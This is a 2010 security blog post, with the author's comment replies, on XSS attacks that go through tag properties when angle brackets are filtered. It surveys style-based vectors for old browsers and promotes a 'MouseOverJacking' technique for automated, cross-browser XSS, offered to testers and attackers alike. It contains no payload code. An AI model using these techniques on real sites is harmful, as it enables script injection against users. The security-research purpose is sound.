In case if for Cross-Site Scripting attack it’s not possible to use any tags and angle brackets at the site, it’s possible to conduct XSS attack with using of tags’ properties. It can be style property, or different even handlers (or sometimes it’s possible to conduct attack via src property). For the attack it’s needed to use quotes (single or double ones, or sometimes even quotes isn’t required), to add new property to the tag, in which we managed to include the code.

At attack via style property the next methods are used (in which the code executes automatically at page opening):

1. Via expression(), which works only in browsers IE (before IE8).
2. Via background:url() or background-image:url(), which works only in browsers IE.
3. Via -moz-binding:url(), which works only in Mozilla Firefox and other browsers on Gecko engine (before Firefox 3).

A possibility of using of onerror, onload and onunload happens not very often, and other handlers trigger not automatically, so they are less popular at conducting of XSS attacks. The most often the attacks via style property are used.

But already in 2008 in Firefox 3 possibility of attack via -moz-binding was removed (it was partly removed - it’s possible to attack only with using of xml-files at the same site). Which I wrote about in article XSS attacks in Mozilla Firefox via styles. And in Internet Explorer 8, which released at beginning of 2009, support of expression() was removed. Support of javascript and vbscript URI in background-image and background-image also can be removed with time.

So in light of these events it became harder to conduct automated XSS attacks in new browsers in such conditions (when it’s not possible to use any tags and angle brackets). And as more widespread these versions of browsers become, the harder it’ll be to conduct XSS attacks in such conditions (so that they will be automated, without need for user to do some actions). From other side, such browsers as Opera, Chrome and other browsers completely resist to attacks via style property.

For solving of this task the technique MouseOverJacking can be used, which I already wrote about. This technique allows to conduct automated XSS attack. At that it’s cross-browser solution, which works in all browsers. Including in IE8 - at using of CSS (as in my PoCs) it allows to bypass IE8’s built-in protection against Clickjacking.

I.e. MouseOverJacking can be used not only for specific attacks, which were about in the article about this technique, but for wide variety of XSS attacks (instead of expression() and -moz-binding). At that the attack is fully automated, so the effectiveness of the attack is the same as in expression() and -moz-binding (and due to cross-browser it’s possible to attack even more users).

It’s possible to conduct such attacks as via MouseOverJacking, as via Clickjacking. But MouseOverJacking has higher effectiveness, because at Clickjacking attack the victim must to do a click (which can not always happen), but at MouseOverJacking it’s not needed to do any actions, only one move of the mouse (which will always happen).

So I propose to use MouseOverJacking technique for wide variety of XSS attacks (in case of impossibility of using of the tags and angle brackets). And security professionals and attackers can use this technique for creating of PoC for XSS vulnerabilities or for conducting of XSS attacks.

This entry was posted
on 21:05 21.01.2010 and is filed under Статті. You can follow any responses to this entry through the RSS 2.0 feed.

I know about Content Security Policy. I wrote about it in November and that time I tested working of CSP in my browsers. And in Mozilla’s CSP demo only two tests were passed in both my old Mozilla and new Firefox 3. So it’s solution for future versions of Firefox browser (for now it’s not actual), we’ll see how it’ll be implemented in the next versions of Firefox (in 3.7) and will see how other browser vendors will act with CSP. But the idea is interesting and promising.

So for now a future of XSS attacks is not too dark. And current mitigations of XSS in new versions of Firefox and IE I bypassed with my MouseOverJacking technique.

P.S.

And tell me, what do you think about using of MouseOverJacking instead of expression() and -moz-binding for conducting XSS attacks as cross-browser solution (which works in any browser, including new versions of Firefox and IE)?

You also tell me, what do you think about using of MouseOverJacking instead of expression() and -moz-binding for conducting XSS attacks as cross-browser solution (which works in any browser, including new versions of Firefox and IE)?

LoL, CSP on all websites in the world

Taking into account, that XSS known already from 1998 (persistent XSS was found in 1998 and term Cross-Site Scripting was introduced in 2000, when reflected XSS was found). And for now, in 2010, after 12 years we have such situation, that 80-90% of web sites in Internet have XSS holes. Than it’s quite possible that nothing will greatly change in next 10 years. So I’m sharing sirdarckcat’s confidence in that (CSP will need to pass a long way before it’ll spread enough).

And because for CSP it’s needed not only browser support, but also server-side support (web developers need to set X-Content-Security-Policy header in their web apps), then it’ll take a long time for spreading of CSP in Internet. As web developers make XSS holes and often don’t want to fix them (or do it slowly, or just ignore it), the same can be with CSP.

about:
> You also tell me, what do you think about using of MouseOverJacking
> instead of expression() and -moz-binding for conducting XSS attacks as
> cross-browser solution (which works in any browser, including new
> versions of Firefox and IE)?

sirdarckcat, really? Because I thought XSS via styles (described in my article) mostly were used .

Are you talking about MouseOverJacking or about XSS via event hadlers? Because these are different things, as I mentioned in my article MouseOverJacking attacks (read “The idea of MouseOverJacking attacks” part of the article).

MouseOverJacking is automated attacks, while XSS via event hadlers is not. I’m using XSS via event hadlers for many years (first time I mentioned at my site about such XSS regarding holes at cenzic.com and picosearch.com), but MouseOverJacking is different thing. It uses both XSS holes (via onMouseOver) and special ways to make attack fully automated - to make it comparable to attacks via styles.

As I mentioned in current article, the most often the attacks via style property are used (I also used them for many years in my PoCs). And taking into account situation with modern browsers, I proposed my cross-browser solution.

Thanks for your feedback. It’s important for me to know thoughts of other security professionals on this topic.

I see that you are mature security professionals and it’s hard to surprise you in this topic, but in any case there was something new in these two articles for you. And looked in my article MouseOverJacking attacks, that there are other attack vectors besides XSS (such as DoS, CSRF and others). And feel free to read other my articles, where you certainly will find something interesting and new for yourself.

I hope the article was interesting for you (as it looks like, because you dicided to translate it). And I hope my English version of the article was sufficiently clear for you . I can suggest for you some breaklines (indents) in the text of your version of my article - it’ll improve its readability.

And feel free to read other my articles (there are English versions of many of them, some of which are published at my site and some at WASC Mailing List).